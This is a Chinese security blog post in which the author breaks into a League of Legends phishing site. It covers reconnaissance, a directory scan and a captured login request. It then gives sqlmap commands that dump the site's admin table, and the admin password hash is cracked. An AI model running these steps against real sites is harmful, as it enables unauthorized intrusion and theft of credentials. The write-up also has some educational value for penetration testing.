专栏名称: HACK学习呀
HACK学习,专注于互联网安全与黑客精神;渗透测试,社会工程学,Python黑客编程,资源分享,Web渗透培训,电脑技巧,渗透技巧等,为广大网络安全爱好者一个交流分享学习的平台!
目录
相关文章推荐
51好读  ›  专栏  ›  HACK学习呀

当英雄联盟钓鱼网站遇到脚本黑客

HACK学习呀  · 公众号  · 黑客  · 2019-10-22 23:23

正文

下午打开QQ邮箱,居然多了一封钓鱼邮件


应该是群发的钓鱼邮件


详细了解 https://baike.baidu.com/item/%E9%B1%BC%E5%8F%89%E5%BC%8F%E7%BD%91%E7%BB%9C%E9%92%93%E9%B1%BC/16763869?fr=aladdin


干他!!!


网址是www.xxxx.com

打开就是这样,直接弹框提示登录

点快捷登录是无效的,其他忘记密码,注册新账号也是无效按钮


思路1:前台这里输入框可以试试XSS,运气好可以插到管理员的后台地址和Cookie信息


LOL钓鱼网站无疑


0x01


这种钓鱼小站


那就常规当信息收集走一波



爱站

https://www.aizhan.com

反查了下注册人和邮箱,没有获得特别有价值的信息


多地ping,无cdn,也不是XX云

http://ping.chinaz.com/

同ip域名查询

https://site.ip138.com/

ip绑定的域名

这个ip上绑定了好几个域名,都是相同模板的钓鱼页面


云悉看看网站指纹信息

http://www.yunsee.cn/

Nginx+PHP环境


0x02


扫描网站目录

利用dirsearch扫描了下目录,发现了www.xxx.cn/history/

打开直接跳后台地址

思路1:Burpsuite爆破后台账号密码

思路2:测试这里是不是有SQL注入


扫端口

只开了80端口


0x03

验证思路


先验证SQL注入

PS:这种无验证码的后台,很大几率存在SQL注入漏洞

Burpsuite抓包

将post包保存为1.txt,在admin后面打上*

标记下sqlmap要跑的参数点

最好使用服务器来跑注入,网络稳定且速度快

POST /history/Verification_admin.php HTTP/1.1
Host: www.xxxx.cn
Content-Length: 30
Cache-Control: max-age=0
Origin: http://www.xxxx.cn
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://www.xxxx.cn/history/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e31r5gmpl27acjt4fvg48km7f7
Connection: close

username=admin*&password=123456

开始测试注入:

sqlmap -r 1.txt --random-agent --dbs --level 3

运气不错

跑出了库,接着跑一下管理员表和数据就行了

sqlmap -r 1.txt --random-agent --level 3 -D sqlxxxx --tables --batch

管理员表:yunx_admin

sqlmap -r 1.txt --level 3 -D sqlxxxx -T yunx_admin --dump --random-agent --batch

账号密码hash到手

上somd5,成功解开了hash

用户名:qazxxxx

密码:wxxxxxx


验证XSS,发现被过滤了,暂时不管







请到「今天看啥」查看全文